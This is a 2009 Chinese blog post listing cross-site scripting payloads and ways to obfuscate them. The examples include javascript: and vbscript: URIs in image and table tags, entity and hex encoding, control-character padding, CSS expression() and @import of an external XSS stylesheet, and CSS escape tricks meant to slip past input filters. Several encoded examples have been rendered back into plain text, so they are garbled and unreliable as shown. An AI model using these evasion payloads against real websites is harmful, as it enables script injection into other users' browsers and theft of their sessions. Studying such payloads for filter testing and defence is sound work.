数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



xss脚本字符转换与混淆
樱木花盗 发表于 2009-10-16 20:56:41
 
1.脚本插入

(1)插入javascript和vbscript正常字符。

例1:<img src="javascript:alert(/xss/)">
例2:<table background="javascript:alert(/xss/)"></table>'/在表格中插入脚本
例3:<img src="vbscript:msgbox("a")">

(2)转换字符类型。将javascript或vbscript中的任一个或全部字符转换为十进制或十六进制字符

例1:<img src="javascript:alert(/xss/)"> '/将j字符转为十进制字符j 。

例2:<img src="javascript:alert(/xss/)"> '/将j字符转为十六进制字符j 。
(3)插入混淆字符。在系统控制字符中,除了头部的&#00(null)和尾部的(del)外,其他31个字符均可作为混淆字符,比如\u0001、\u0002等字符都可插入到javascript或vbscript的头部,其中Tab符 、换行符、回车符还可以插入到代码中任意地方。
例1:<img src="\u0001javascript:alert(/a/)"> '/插入到代码头部,其中\u0001可写成\u0001,效果一样
例2:<img src="java scr ipt:alert(/a/)"> '/插入到代码中任意位置,其中 可写成

    2 样式表

(1)利用CSS代码@import、e­xpression触发XSS漏洞。
例1:@import "http://hi.baidu.com/jc123/xss.css"; '导入外部带有XSS代码的CSS样式表。
例2:@import'javascript:alert("xss")'; '调用javascript脚本触发漏洞
例3:body{xss:e­xpression(alert('xss'))} '在内部样式表中加入e­xpression事件
例4:<img style="xss:e­xpression(alert("xss"))">'在内嵌样式表中加入e­xpression事件
(2)在CSS代码中加入javascript和vbscript脚本
例1:body{background-image:url(javascript:alert("xss"))}
例2:body{background-image:url(vbscript:msgbox("xss"))}
(3)转换字符类型,以十六进制字符替换其中或全部的字符:
例1:@\0069mport:url(/BLOG/web/1.css);'//将其中的i转为\0069
例2:body{xss:\0065xpression(alert('xss'))}'//将e转换为\0065
例3:body{background-image:\0075\0072\006c...}'将url全转为16进制
(4)插入混淆字符,在css中,/**/是注释字符,除了/**/外,字符"\"和结束符"\0"也是被忽略的,可以用来混淆字符。
例1:@\0im\port'\0ja\vasc\ript:alert("xss")';
例2:@\i\0m\00p\000o\0000\00000r\000000t"url";


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.